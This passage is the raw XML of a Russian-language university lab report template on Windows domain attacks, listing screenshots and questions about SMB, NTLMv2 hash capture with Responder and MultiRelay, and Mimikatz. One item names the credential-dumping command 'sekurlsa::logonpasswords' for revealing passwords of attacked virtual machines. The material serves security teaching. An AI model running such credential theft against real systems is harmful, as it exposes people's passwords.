        <w:t xml:space="preserve"> с видимым наименованием созданных Вами виртуальных машин</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46F1226F" w14:textId="77777777" w:rsidR="001D7AF0" w:rsidRDefault="001D7AF0" w:rsidP="001D7AF0">
      <w:r>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>VirtualBox</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> с открытым в Windows 7 окном «Свойства: Протокол Интернета версии 4 (TCP/IPv4)», в котором видны прописанные статические параметры сети</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C20C305" w14:textId="2BC2E23A" w:rsidR="001D7AF0" w:rsidRPr="001D7AF0" w:rsidRDefault="001D7AF0" w:rsidP="001D7AF0">
      <w:r>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>VirtualBox</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> с открытым в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2008 с аналогичным окном свойств параметров сети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0306F4" w14:paraId="239119AF" w14:textId="77777777" w:rsidTr="002F76F7">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="10195" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="01D355D9" w14:textId="77777777" w:rsidR="000306F4" w:rsidRDefault="000306F4" w:rsidP="002F76F7">
            <w:pPr>
              <w:spacing w:before="240" w:after="240" w:line="240" w:lineRule="auto"/>
              <w:ind w:firstLine="0"/>
            </w:pPr>
            <w:bookmarkStart w:id="14" w:name="_Hlk34166387"/>
            <w:r>
              <w:t>Скриншот № 1</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:bookmarkEnd w:id="14"/>
    </w:tbl>
    <w:p w14:paraId="10931CBB" w14:textId="77777777" w:rsidR="000306F4" w:rsidRDefault="000306F4" w:rsidP="000306F4"/>
    <w:p w14:paraId="76C1E75B" w14:textId="61E8DAEC" w:rsidR="000306F4" w:rsidRPr="001D7AF0" w:rsidRDefault="000306F4" w:rsidP="000306F4">
      <w:r>
        <w:t xml:space="preserve">2. </w:t>
      </w:r>
      <w:r w:rsidR="001D7AF0">
        <w:t xml:space="preserve">Результаты создания доменного пользователя на </w:t>
      </w:r>
      <w:r w:rsidR="001D7AF0">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Windows</w:t>
      </w:r>
      <w:r w:rsidR="001D7AF0" w:rsidRPr="001D7AF0">
        <w:t xml:space="preserve"> 7</w:t>
      </w:r>
      <w:r w:rsidR="001D7AF0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0306F4" w14:paraId="23EDF279" w14:textId="77777777" w:rsidTr="002F76F7">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="10195" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="07D57B75" w14:textId="77777777" w:rsidR="000306F4" w:rsidRDefault="000306F4" w:rsidP="002F76F7">
            <w:pPr>
              <w:spacing w:before="240" w:after="240" w:line="240" w:lineRule="auto"/>
              <w:ind w:firstLine="0"/>
            </w:pPr>
            <w:bookmarkStart w:id="15" w:name="_Hlk37848632"/>
            <w:r>
              <w:t>Скриншот № 2</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:bookmarkEnd w:id="15"/>
    </w:tbl>
    <w:p w14:paraId="7A7BE3EB" w14:textId="77777777" w:rsidR="000306F4" w:rsidRDefault="000306F4" w:rsidP="000306F4"/>
    <w:p w14:paraId="1C9C1A4B" w14:textId="0D3F533A" w:rsidR="000306F4" w:rsidRPr="001D7AF0" w:rsidRDefault="001D7AF0" w:rsidP="000306F4">
      <w:r>
        <w:t xml:space="preserve">3. Окно входа в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Windows</w:t>
      </w:r>
      <w:r w:rsidRPr="001D7AF0">
        <w:t xml:space="preserve"> 7</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> под доменным пользователем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1D7AF0" w14:paraId="55AB7DD2" w14:textId="77777777" w:rsidTr="002F76F7">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="10195" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="1FFA0556" w14:textId="3267DA17" w:rsidR="001D7AF0" w:rsidRDefault="001D7AF0" w:rsidP="002F76F7">
            <w:pPr>
              <w:spacing w:before="240" w:after="240" w:line="240" w:lineRule="auto"/>
              <w:ind w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:t>Скриншот № 3</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="2BA966EB" w14:textId="1911BBD1" w:rsidR="000306F4" w:rsidRDefault="000306F4" w:rsidP="000306F4"/>
    <w:p w14:paraId="585F0D80" w14:textId="5EB0BB6C" w:rsidR="001C2556" w:rsidRDefault="001C2556" w:rsidP="000306F4">
      <w:r>
        <w:t xml:space="preserve">4. Результаты подключения компьютера к домену, отображаемые в окне </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Server</w:t>
      </w:r>
      <w:r w:rsidRPr="001C2556">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Manager</w:t>
      </w:r>
      <w:r w:rsidRPr="001C2556">
        <w:t>’</w:t>
      </w:r>
      <w:r>
        <w:t>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1C2556" w14:paraId="7DADA2D3" w14:textId="77777777" w:rsidTr="002F76F7">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="10195" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="75594B60" w14:textId="5380956E" w:rsidR="001C2556" w:rsidRDefault="001C2556" w:rsidP="002F76F7">
            <w:pPr>
              <w:spacing w:before="240" w:after="240" w:line="240" w:lineRule="auto"/>
              <w:ind w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:t>Скриншот № 4</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="3D130FAD" w14:textId="77777777" w:rsidR="001C2556" w:rsidRPr="001C2556" w:rsidRDefault="001C2556" w:rsidP="000306F4"/>
    <w:p w14:paraId="47B2B82B" w14:textId="2E08D02F" w:rsidR="001C2556" w:rsidRDefault="001C2556" w:rsidP="000306F4">
      <w:r>
        <w:t>5</w:t>
      </w:r>
      <w:r w:rsidR="000306F4">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="0095332B">
        <w:t>Ч</w:t>
      </w:r>
      <w:r w:rsidR="0095332B" w:rsidRPr="0095332B">
        <w:t xml:space="preserve">то такое SMB и что за </w:t>
      </w:r>
      <w:r w:rsidR="0095332B">
        <w:t xml:space="preserve">результат мы </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="0095332B">
        <w:t>получили</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="0095332B" w:rsidRPr="0095332B">
        <w:t xml:space="preserve"> отключив SMB</w:t>
      </w:r>
      <w:r w:rsidR="0095332B">
        <w:t>?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5444CDD7" w14:textId="14D89D4C" w:rsidR="001C2556" w:rsidRDefault="001C2556" w:rsidP="000306F4"/>
    <w:p w14:paraId="55171C6A" w14:textId="27E19EE3" w:rsidR="0095332B" w:rsidRDefault="0095332B" w:rsidP="000306F4">
      <w:r>
        <w:t>6. Т</w:t>
      </w:r>
      <w:r w:rsidRPr="0095332B">
        <w:t>рактовк</w:t>
      </w:r>
      <w:r>
        <w:t>а</w:t>
      </w:r>
      <w:r w:rsidRPr="0095332B">
        <w:t xml:space="preserve"> параметров вводимых команд, в том числе</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> описание</w:t>
      </w:r>
      <w:r w:rsidRPr="0095332B">
        <w:t xml:space="preserve"> назначени</w:t>
      </w:r>
      <w:r>
        <w:t>я</w:t>
      </w:r>
      <w:r w:rsidRPr="0095332B">
        <w:t xml:space="preserve"> портов 137, 139 и 445</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="159941E9" w14:textId="33823A26" w:rsidR="0095332B" w:rsidRDefault="0095332B" w:rsidP="000306F4"/>
    <w:p w14:paraId="25FD879E" w14:textId="56461B8C" w:rsidR="0095332B" w:rsidRDefault="0095332B" w:rsidP="000306F4">
      <w:r>
        <w:t>7. С</w:t>
      </w:r>
      <w:r w:rsidRPr="0095332B">
        <w:t xml:space="preserve">криншот, из которого виден NTMLv2-SSP </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0095332B">
        <w:t>Hash</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0095332B">
        <w:t xml:space="preserve"> из Вашей вир</w:t>
      </w:r>
      <w:r>
        <w:t>ту</w:t>
      </w:r>
      <w:r w:rsidRPr="0095332B">
        <w:t>альной машины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95332B" w14:paraId="7769C020" w14:textId="77777777" w:rsidTr="002F76F7">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="10195" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="5E04C0EA" w14:textId="25F25F5A" w:rsidR="0095332B" w:rsidRDefault="0095332B" w:rsidP="002F76F7">
            <w:pPr>
              <w:spacing w:before="240" w:after="240" w:line="240" w:lineRule="auto"/>
              <w:ind w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:t>Скриншот № 5</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="130F9C1E" w14:textId="4504842E" w:rsidR="001C2556" w:rsidRDefault="001C2556" w:rsidP="000306F4"/>
    <w:p w14:paraId="67E935E8" w14:textId="219DA279" w:rsidR="002F76F7" w:rsidRDefault="002F76F7" w:rsidP="002F76F7">
      <w:r>
        <w:t xml:space="preserve">8. Скриншот совместной работы </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Responder</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> и </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>MultiRelay</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> (результат выполнения пункта 13.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2F76F7" w14:paraId="286441CB" w14:textId="77777777" w:rsidTr="002F76F7">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="10195" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="3CB289FB" w14:textId="1E7FF52B" w:rsidR="002F76F7" w:rsidRDefault="002F76F7" w:rsidP="002F76F7">
            <w:pPr>
              <w:spacing w:before="240" w:after="240" w:line="240" w:lineRule="auto"/>
              <w:ind w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:t>Скриншот № 6</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="376ECBD5" w14:textId="77777777" w:rsidR="002F76F7" w:rsidRDefault="002F76F7" w:rsidP="002F76F7"/>
    <w:p w14:paraId="7BE0E814" w14:textId="4CB3367D" w:rsidR="002F76F7" w:rsidRDefault="002F76F7" w:rsidP="000306F4">
      <w:r>
        <w:t>9. Ответ на вопросы лабораторной работы:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79CD7290" w14:textId="77777777" w:rsidR="002F76F7" w:rsidRDefault="002F76F7" w:rsidP="002F76F7">
      <w:pPr>
        <w:pStyle w:val="a6"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="002F76F7">
        <w:t xml:space="preserve">Что такое </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="002F76F7">
        <w:t>Mimikatz</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002F76F7">
        <w:t xml:space="preserve">? </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73D959E0" w14:textId="77777777" w:rsidR="002F76F7" w:rsidRDefault="002F76F7" w:rsidP="002F76F7">
      <w:pPr>
        <w:pStyle w:val="a6"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="002F76F7">
        <w:t xml:space="preserve">Зачем он нужен? </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="777C9933" w14:textId="59B0EF4E" w:rsidR="002F76F7" w:rsidRDefault="002F76F7" w:rsidP="002F76F7">
      <w:pPr>
        <w:pStyle w:val="a6"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="002F76F7">
        <w:t>Как его использовать?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C0F226F" w14:textId="77777777" w:rsidR="002F76F7" w:rsidRDefault="002F76F7" w:rsidP="000306F4"/>
    <w:p w14:paraId="7F100BE6" w14:textId="47C15BAB" w:rsidR="002F76F7" w:rsidRPr="00BC1D36" w:rsidRDefault="002F76F7" w:rsidP="000306F4">
      <w:r>
        <w:t xml:space="preserve">10. Результат выполнения команды </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>mimi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CF6C27">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>sekurlsa</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CF6C27">
        <w:t>::</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>logonpasswords</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00BC1D36">
        <w:t>, на котором видны пароли атакуемых машин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195"/>
      </w:tblGrid>
      <w:tr w:rsidR="002F76F7" w14:paraId="3344D570" w14:textId="77777777" w:rsidTr="002F76F7">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="10195" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="65C0DF56" w14:textId="55ADC133" w:rsidR="002F76F7" w:rsidRDefault="002F76F7" w:rsidP="002F76F7">
            <w:pPr>
              <w:spacing w:before="240" w:after="240" w:line="240" w:lineRule="auto"/>
              <w:ind w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:t>Скриншот № 7</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="55150177" w14:textId="77777777" w:rsidR="002F76F7" w:rsidRDefault="002F76F7" w:rsidP="000306F4"/>
    <w:p w14:paraId="5DA9BD19" w14:textId="2D00F5EF" w:rsidR="000306F4" w:rsidRDefault="000306F4" w:rsidP="000306F4">
      <w:r>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidR="00BC1D36">
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:t>. Индивидуальные выводы по лабораторной работе.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53C85C25" w14:textId="77777777" w:rsidR="000306F4" w:rsidRDefault="000306F4" w:rsidP="000306F4">
      <w:r>
        <w:t xml:space="preserve">Вывод по работе формируются студентом </w:t>
      </w:r>
      <w:r w:rsidRPr="006042CD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>индивидуально</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> и </w:t>
      </w:r>
      <w:r w:rsidRPr="006042CD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="C00000"/>
        </w:rPr>
        <w:t>независимо</w:t>
      </w:r>
      <w:r w:rsidRPr="006042CD">
        <w:rPr>
          <w:color w:val="C00000"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">от согруппников. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4883DF24" w14:textId="77777777" w:rsidR="000306F4" w:rsidRDefault="000306F4" w:rsidP="000306F4">
      <w:r>
        <w:t>Вывод должен содержать информацию о:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="061450E8" w14:textId="77777777" w:rsidR="000306F4" w:rsidRDefault="000306F4" w:rsidP="000306F4">
      <w:pPr>
        <w:pStyle w:val="a6"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">понятой </w:t>
      </w:r>
      <w:r w:rsidRPr="00D66FB7">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>лично Вами</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> цели Л/р,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54708C2D" w14:textId="77777777" w:rsidR="000306F4" w:rsidRDefault="000306F4" w:rsidP="000306F4">
      <w:pPr>
        <w:pStyle w:val="a6"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>оценке достигнутого результата по итогам выполнения Л/р</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CBE8784" w14:textId="77777777" w:rsidR="000306F4" w:rsidRPr="00636D99" w:rsidRDefault="000306F4" w:rsidP="000306F4">
      <w:pPr>
        <w:pStyle w:val="a6"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>знаниях, полученных в результате выполнения Л/р</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3461C5BF" w14:textId="77777777" w:rsidR="000306F4" w:rsidRPr="00636D99" w:rsidRDefault="000306F4" w:rsidP="000306F4">
      <w:pPr>
        <w:pStyle w:val="a6"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>умениях, полученных в результате выполнения Л/р</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25EBEE5B" w14:textId="77777777" w:rsidR="000306F4" w:rsidRPr="00636D99" w:rsidRDefault="000306F4" w:rsidP="000306F4">
      <w:pPr>
        <w:pStyle w:val="a6"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>практических навыках, полученных в результате выполнения Л/р</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A22768D" w14:textId="77777777" w:rsidR="00AC4475" w:rsidRDefault="00AC4475" w:rsidP="008F4D2E"/>
    <w:sectPr w:rsidR="00AC4475" w:rsidSect="00BB7B57">
      <w:footerReference w:type="default" r:id="rId67"/>
      <w:type w:val="evenPage"/>
      <w:pgSz w:w="11906" w:h="16838"/>
      <w:pgMar w:top="1134" w:right="567" w:bottom="1134" w:left="1134" w:header="709" w:footer="709" w:gutter="0"/>
      <w:pgNumType w:start="1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lexandr Dr." w:date="2020-03-18T14:54:00Z" w:initials="AD">
    <w:p w14:paraId="63B38E6F" w14:textId="3C3B5C96" w:rsidR="002F76F7" w:rsidRPr="00D850BF" w:rsidRDefault="002F76F7">
      <w:pPr>
        <w:pStyle w:val="af7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="af6"/>
        </w:rPr>
        <w:annotationRef/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">В отчете необходимо дать пояснение сделанному выбору с указанием того, какие дополнительные действия было бы необходимо предпринять для настройки сети или почему с другим вариантов работы сети не удастся выполнить задание л/р, например, что произойдёт если оставить </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>NAT</w:t>
      </w:r>
      <w:r w:rsidRPr="00D850BF">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>или виртуальный адаптер хоста, как это было в л/р № 2</w:t>
      </w:r>
    </w:p>
  </w:comment>
  <w:comment w:id="1" w:author="Alexandr Dr." w:date="2020-03-18T16:12:00Z" w:initials="AD">
    <w:p w14:paraId="038C2BEE" w14:textId="77777777" w:rsidR="002F76F7" w:rsidRDefault="002F76F7">
      <w:pPr>
        <w:pStyle w:val="af7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="af6"/>
        </w:rPr>
        <w:annotationRef/>
      </w:r>
      <w:r>
        <w:t>Сделать скриншот рабочего стола, на котором видны:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F454906" w14:textId="7098967D" w:rsidR="002F76F7" w:rsidRDefault="002F76F7">
      <w:pPr>
        <w:pStyle w:val="af7"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>VirtualBox</w:t>
      </w:r>
      <w:r w:rsidRPr="00DB30B6">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>с видимым наименованием созданных Вами виртуальных машин</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42005076" w14:textId="77777777" w:rsidR="002F76F7" w:rsidRDefault="002F76F7">
      <w:pPr>
        <w:pStyle w:val="af7"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>VirtualBox</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> с открытым в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Windows</w:t>
      </w:r>
      <w:r w:rsidRPr="00DB30B6">
        <w:t xml:space="preserve"> 7</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> окном «Свойства: Протокол Интернета версии 4 </w:t>
      </w:r>
      <w:r w:rsidRPr="00DB30B6">
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>TCP</w:t>
      </w:r>
      <w:r w:rsidRPr="00DB30B6">
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>IPv</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00DB30B6">
        <w:t>4)</w:t>
      </w:r>
      <w:r>
        <w:t>», в котором видны прописанные статические параметры сети</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48B1F1B5" w14:textId="2309585E" w:rsidR="002F76F7" w:rsidRDefault="002F76F7" w:rsidP="00DB30B6">
      <w:pPr>
        <w:pStyle w:val="af7"/>
      </w:pPr>
      <w:r w:rsidRPr="00DB30B6">
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>VirtualBox</w:t>
      </w:r>
      <w:r w:rsidRPr="00DB30B6">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>с</w:t>
      </w:r>
      <w:r w:rsidRPr="00DB30B6">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>открытым</w:t>
      </w:r>
      <w:r w:rsidRPr="00DB30B6">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>в</w:t>
      </w:r>
      <w:r w:rsidRPr="00DB30B6">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Windows</w:t>
      </w:r>
      <w:r w:rsidRPr="00DB30B6">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Server</w:t>
      </w:r>
      <w:r w:rsidRPr="00DB30B6">
        <w:t xml:space="preserve"> 2008 </w:t>
      </w:r>
      <w:r>
        <w:t>с аналогичным окном свойств параметров сети</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="388FD568" w14:textId="6AA32CFC" w:rsidR="002F76F7" w:rsidRDefault="002F76F7" w:rsidP="00DB30B6">
      <w:pPr>
        <w:pStyle w:val="af7"/>
      </w:pPr>
      <w:r>
        <w:t>(Аналог пункта 5.3.)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FE8A6E8" w14:textId="31BC5CA5" w:rsidR="002F76F7" w:rsidRPr="00DB30B6" w:rsidRDefault="002F76F7">
      <w:pPr>
        <w:pStyle w:val="af7"/>
      </w:pPr>
    </w:p>
  </w:comment>
  <w:comment w:id="2" w:author="Alexandr Dr." w:date="2020-04-15T12:52:00Z" w:initials="AD">
    <w:p w14:paraId="43D3BBF6" w14:textId="279BD8E1" w:rsidR="002F76F7" w:rsidRDefault="002F76F7">
      <w:pPr>
        <w:pStyle w:val="af7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="af6"/>
        </w:rPr>
        <w:annotationRef/>
      </w:r>
      <w:r>
        <w:t>В отчет необходимо поместить аналогичный скриншот с Вашими настройками сети</w:t>
      </w:r>
    </w:p>
  </w:comment>
  <w:comment w:id="3" w:author="Alexandr Dr." w:date="2020-04-15T12:53:00Z" w:initials="AD">
    <w:p w14:paraId="4BF1CBE8" w14:textId="7E2065E7" w:rsidR="002F76F7" w:rsidRDefault="002F76F7">
      <w:pPr>
        <w:pStyle w:val="af7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="af6"/>
        </w:rPr>
        <w:annotationRef/>
      </w:r>
      <w:r>
        <w:t>В отчет необходимо поместить данные созданного Вами пользователя</w:t>
      </w:r>
    </w:p>
  </w:comment>
  <w:comment w:id="4" w:author="Alexandr Dr." w:date="2020-04-15T12:54:00Z" w:initials="AD">
    <w:p w14:paraId="7ED27872" w14:textId="7078CE76" w:rsidR="002F76F7" w:rsidRDefault="002F76F7">
      <w:pPr>
        <w:pStyle w:val="af7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="af6"/>
        </w:rPr>
        <w:annotationRef/>
      </w:r>
      <w:r>
        <w:t>В отчет необходимо поместить скриншот, подтверждающий вход под доменным пользователем</w:t>
      </w:r>
    </w:p>
  </w:comment>
  <w:comment w:id="5" w:author="Alexandr Dr." w:date="2020-04-15T12:55:00Z" w:initials="AD">
    <w:p w14:paraId="304D8142" w14:textId="375BF242" w:rsidR="002F76F7" w:rsidRPr="009E6CEC" w:rsidRDefault="002F76F7">
      <w:pPr>
        <w:pStyle w:val="af7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="af6"/>
        </w:rPr>
        <w:annotationRef/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Аналогичный скриншот с видимыми </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>IP</w:t>
      </w:r>
      <w:r>
        <w:t>-адресами необходимо поместить в отчет</w:t>
      </w:r>
    </w:p>
  </w:comment>
  <w:comment w:id="6" w:author="Alexandr Dr." w:date="2020-03-18T16:20:00Z" w:initials="AD">
    <w:p w14:paraId="6C242F9A" w14:textId="352A16F6" w:rsidR="002F76F7" w:rsidRPr="00017D46" w:rsidRDefault="002F76F7">
      <w:pPr>
        <w:pStyle w:val="af7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="af6"/>
        </w:rPr>
        <w:annotationRef/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">В отчете поясните что такое </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>SMB</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> и что за действие мы сделали в настоящем пункте отключив </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>SMB</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
  </w:comment>
  <w:comment w:id="7" w:author="Alexandr Dr." w:date="2020-03-25T21:50:00Z" w:initials="AD">
    <w:p w14:paraId="2921EA54" w14:textId="781440F9" w:rsidR="002F76F7" w:rsidRDefault="002F76F7">
      <w:pPr>
        <w:pStyle w:val="af7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="af6"/>
        </w:rPr>
        <w:annotationRef/>
      </w:r>
      <w:r>
